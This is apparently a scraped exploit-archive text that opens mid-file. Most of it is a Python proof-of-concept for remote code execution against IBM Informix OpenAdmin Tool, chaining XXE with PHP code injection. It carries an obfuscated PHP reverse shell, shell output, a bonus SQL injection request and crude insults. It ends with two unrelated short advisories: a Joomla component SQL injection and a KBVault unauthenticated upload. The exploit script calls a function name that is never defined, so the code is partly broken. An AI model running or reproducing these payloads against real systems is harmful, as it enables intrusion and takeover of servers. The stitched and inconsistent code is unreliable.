header("Location: {$this->idsadmin->get_config("BASEURL")}/index.php?act=help&helpact={$this->idsadmin->in['helpact']}&helpdo={$this->idsadmin->in['helpdo']}");
die();
}
if ( isset($this->idsadmin->in['lang']) )
{
// If the user has changed the language, set the new language now.
$this->idsadmin->validate_lang_param();
$this->idsadmin->phpsession->set_lang($this->idsadmin->in['lang']);
}
switch( $this->idsadmin->in['do'] ) // 2. switch our do parameter
{
case "getconnections":
if ( ! isset($this->idsadmin->in['group_num']) )
{
$grpnum = 1;
}
else
{
$grpnum = $this->idsadmin->in['group_num'];
}
$this->getconnections($grpnum);
break;
...
case "doconfig":
$this->idsadmin->html->set_pagetitle($this->idsadmin->lang("OATconfig"));
$this->doconfig(); // 3. calls doconfig
break;
Now, onto the doconfig function:
function doconfig()
{
// None of the config parameters can contain quotes.
foreach ($this->idsadmin->in as $i => $v)
{
if (strstr($v,"\"") || strstr($v,"'"))
{
$this->idsadmin->load_lang("global");
$this->idsadmin->error($this->idsadmin->lang("invalidParamNoQuotes",array($i)));
$this->config();
return;
}
}
$conf_vars = array (
"LANG" => $this->idsadmin->lang("LANG")
,"CONNDBDIR" => $this->idsadmin->lang("CONNDBDIR")
,"BASEURL" => $this->idsadmin->lang("BASEURL")
,"HOMEDIR" => $this->idsadmin->lang("HOMEDIR")
,"HOMEPAGE" => $this->idsadmin->lang("HOMEPAGE")
,"PINGINTERVAL" => $this->idsadmin->lang("PINGINTERVAL")
,"ROWSPERPAGE" => $this->idsadmin->lang("ROWSPERPAGE")
,"SECURESQL" => $this->idsadmin->lang("SECURESQL")
,"INFORMIXCONTIME" => $this->idsadmin->lang("INFORMIXCONTIME")
,"INFORMIXCONRETRY" => $this->idsadmin->lang("INFORMIXCONRETRY")
);
# create backup of file
$src=$this->idsadmin->get_config('HOMEDIR')."/conf/config.php";
$dest=$this->idsadmin->in['HOMEDIR']."/conf/BAKconfig.php";
copy($src,$dest);
# open the file
if (! is_writable($src))
{
$this->config($this->idsadmin->lang("SaveCfgFailure"). " $src");
return;
}
$fd = fopen($src,'w+'); // 4. get a handle to a php file
# write out the conf
fputs($fd,"<?php \n");
foreach ($conf_vars as $k => $v)
{
if ($k == "CONNDBDIR" || $k == "HOMEDIR")
{
// Replace backslashes in paths with forward slashes
$this->idsadmin->in[$k] = str_replace('\\', '/', $this->idsadmin->in[$k]);
}
$out = "\$CONF['{$k}']=\"{$this->idsadmin->in[$k]}\"; #{$v}\n"; // 5. dangerous
fputs($fd,$out); // 6. PHP Injection
}
fputs($fd,"?>\n");
fclose($fd);
$this->idsadmin->html->add_to_output($this->idsadmin->template["template_global"]->global_redirect($this->idsadmin->lang("SaveCfgSuccess"),"index.php?act=admin"));
} #end config
I suspect Andrea missed this bug because of this code:
// None of the config parameters can contain quotes.
foreach ($this->idsadmin->in as $i => $v)
{
if (strstr($v,"\"") || strstr($v,"'")) // check for double quotes
{
$this->idsadmin->load_lang("global");
$this->idsadmin->error($this->idsadmin->lang("invalidParamNoQuotes",array($i)));
$this->config();
return;
}
}
I'm sure his assumption was that if you can't break out of the double quotes, you can't get RCE. Well, MR I have 40 years experiance.
Example:
~~~~~~~~
sh-3.2$ ./poc.py
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Found By: IMgod aka rgay
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.1.172 192.168.1.1:1111
sh-3.2$ ./poc.py 192.168.1.172 192.168.1.1:1111
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Found By: IMgod aka rgay
(+) PHP code injection done!
(+) starting handler on port 1111
(+) connection from 172.16.175.172
(+) popping a shell!
id
uid=2(daemon) gid=2(daemon) groups=1(bin),2(daemon)
uname -a
Linux informixva 2.6.27.39-0.3-pae #1 SMP 2009-11-23 12:57:38 +0100 i686 i686 i386 GNU/Linux
"""
import sys
import requests
import telnetlib
import socket
from threading import Thread
from base64 import b64encode as b64e
def banner():
return """\n\tIBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)\n\tFound by: IMgod aka rgay\n"""
def check_args():
global t, ls, lp
if len(sys.argv) < 3:
return False
t = "http://%s/openadmin/admin/index.php?act=admin&do=doimport" % sys.argv[1]
ls = sys.argv[2].split(":")[0]
lp = int(sys.argv[2].split(":")[1])
return True
def handler(lport):
print "(+) starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) popping a shell!"
t.interact()
# build the reverse php shell
def build_php_code():
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (ls, lp))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (ls, lp))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
return phpkode
def suntzu_omfg_no_one_can_steal_my_software_yo():
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
target = "http://127.0.0.1/openadmin/conf/config.php?c=eval%%28base64_decode%%28%%27%s%%27%%29%%29%%3b" % b64e(build_php_code())
p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
r = requests.post("%s" % t, files=f)
def suntzu_omfg_i_am_40_years_old_and_fuckn_fat():
target = "http://127.0.0.1/openadmin/admin/index.php?act=admin&do=doconfig&LANG=en_US&BASEURL=http%3A%2F%2Flocalhost%3A80%2Fopenadmin&HOMEDIR=%2Fopt%2FIBM%2FOpenAdmin%2FOAT%2FApache_2.4.2%2Fhtdocs%2Fopenadmin%2F&CONNDBDIR=%2Fopt%2FIBM%2FOpenAdmin%2FOAT%2FOAT_conf%2F&HOMEPAGE=%7b%24%7beval%28%24_GET%5bc%5d%29%7d%7d&PINGINTERVAL=300&ROWSPERPAGE=25&SECURESQL=on&INFORMIXCONTIME=20&INFORMIXCONRETRY=3&dosaveconf=Save"
p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
r = requests.post("%s" % t, files=f)
if r.status_code == 200:
return True
return False
def main():
print banner()
if not check_args():
print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
print "(+) eg: %s 192.168.1.172 192.168.1.1:1111" % sys.argv[0]
sys.exit()
if suntzu_omfg_i_am_40_years_old_and_fuckn_fat():
print "(+) PHP code injection done!"
suntzu_omfg_no_one_can_audit_my_software_yo()
if __name__ == '__main__':
main()
"""
Bonus bug SQL Injection!
POST /openadmin/admin/index.php?act=admin&do=doimport HTTP/1.1
Host: 192.168.1.172
Connection: close
Content-Type: multipart/form-data; boundary=--------1366435377
Content-Length: 258
----------1366435377
Content-Disposition: form-data; name="importfile"; filename="rektGOD.txt"
Content-Type: text/plain
<?xml version="1.0" encoding="ISO-8859-1"?>
<root><group name="rgay' or '1'=(select '1') -- "></group></root>
----------1366435377--
"""
# # # # #
# Exploit Title: Joomla! Component JoomRecipe 1.0.3 - SQL Injection
# Dork: N/A
# Date: 15.06.2017
# Vendor : http://joomboost.com/
# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/
# Demo: http://demo-joomrecipe.joomboost.com/
# Version: 1.0.3
# # # # #
# Author: EziBilisim
# Author Web: https://ezibilisim.com/
# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/all-recipes/category/[SQL]
# # # # #
# Exploit Title: [KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code]
# Google Dork: [inurl:"FileExplorer/Explorer.aspx"]
# Date: [2017-06-14]
# Exploit Author: [Fatih Emiral]
# Vendor Homepage: [http://kbvaultmysql.codeplex.com/]
# Software Link: [http://kbvaultmysql.codeplex.com/downloads/get/858806]
# Version: [0.16a]
# Tested on: [Windows 7 (applicable to all Windows platforms)]
# CVE : [CVE-2017-9602]
1. Description
KBVault Mysql Free Knowledge Base application package comes with a third party file management component. An unauthenticated user can access the file upload (and delete) functionality using the following URI:
http://host/FileExplorer/Explorer.aspx?id=/Uploads
2. Exploit
Through this functionality a user can upload an ASPX script to run any arbitrary code, e.g.:
http://host/Uploads/Documents/cmd.aspx
3. Solution
Unauthenticated access to the file management function should be prohibited.
File uploads should be checked against executable formats, and only acceptable file types should be allowed to upload.
4. Disclosure Timeline
2017-06-09: Vendor notification
2017-06-09: Vendor responded with intention to fix the vulnerability
2017-06-12: CVE number acquired
2017-06-15: Public disclosure